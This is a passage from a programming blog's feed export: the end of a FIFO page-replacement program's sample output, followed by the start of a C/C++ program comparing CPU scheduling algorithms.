&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return 0;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
}&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 14pt; line-height: 28px;&quot;&gt;OUTPUT:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px;&quot;&gt;
ENTER THE NUMBER OF PAGES:&amp;nbsp;&amp;nbsp;20&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px;&quot;&gt;
ENTER THE PAGE NUMBER :&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;7 0 1 2 0 3 0 4 2 3 0 3 2 1 2 0 1 7 0 1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 21px;&quot;&gt;
ENTER THE NUMBER OF FRAMES :3&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px;&quot;&gt;
&lt;u&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ref string&lt;/u&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;u&gt;page frames&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
0&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
4&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;4&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;4&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
3&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;4&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;3&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;3&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
3&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
2&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;3&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
0&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
Page Fault Is 15&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 0.5in;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Verdana; line-height: 20px; margin-left: 0.5in;&quot;&gt;
&lt;b&gt;Any problem?? Drop a comment!&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/669009266496406622/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/program-for-fifo-page-replacement.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/669009266496406622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/669009266496406622'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/program-for-fifo-page-replacement.html' title='Program for FIFO Page Replacement Algorithm in C'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zHtyWsTP_Y0Ua7Kg6jTqz0pjgdcrHpq5BdhRLiTwPwcBSp5hlhtm78mq7_OmRzt7Lem4ZPB9WpBlY0BwlEXuagTw3XfFlAp2BZIzSAUMYjy4FyUNRRUZk7oqDElXxAf18PGjwvPLv1Pc/s72-c/c+and+c%252B%252B+meansofmine.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-8481852147945899289</id><published>2013-10-22T22:09:00.000+05:30</published><updated>2013-10-24T15:13:55.964+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computer"/><category scheme="http://www.blogger.com/atom/ns#" term="Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Program for Comparison between various CPU Scheduling Algorithms</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: large;&quot;&gt;&lt;span style=&quot;line-height: 20px;&quot;&gt;I have created this program for comparison between various cpu scheduling algorithms. I have included First Come First Serve(FCFS), Shortest Job First(SJF), Priority Scheduling and Round Robin Scheduling in it.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;#include&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;#include&amp;lt;iostream.h&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;#include&amp;lt;conio.h&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;void main()&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;clrscr();&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;//fcfs&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;int temp=0,i,PR3[4],tq,B1[4],TAT1[4],B2[4],B3[4],B4[4],W1[4],SWT1=0,STT1=0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;float AWT1=0.0,ATT1=0.0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;char P1[4];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;Enter process names with their Burst Time and Priority(Ashish)\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cin&amp;gt;&amp;gt;P1[i]&amp;gt;&amp;gt;B1[i]&amp;gt;&amp;gt;PR3[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;B2[i]=B1[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;B3[i]=B1[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;B4[i]=B1[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cout&amp;lt;&amp;lt;&quot;\nEnter time slice for round robin\n&quot;;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;cin&amp;gt;&amp;gt;tq;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;W1[0]=0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=1;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;W1[i]=W1[i-1]+B1[i-1];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;TAT1[i]=W1[i]+B1[i];&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;3;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;SWT1=SWT1+W1[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;STT1=STT1+TAT1[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;AWT1=(float)SWT1/3;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;ATT1=(float)STT1/3;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;//sjf&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;int W2[4],TAT2[4],SWT2=0,STT2=0;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;float AWT2=0.0,ATT2=0.0;&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot; /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(int j=0;j&amp;lt;3;j++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;for(i=0;i&amp;lt;2-j;i++)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;if(B2[i]&amp;gt;B2[i+1])&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;{temp=B2[i];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;B2[i]=B2[i+1];&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;B2[i+1]=temp;}&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20px;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
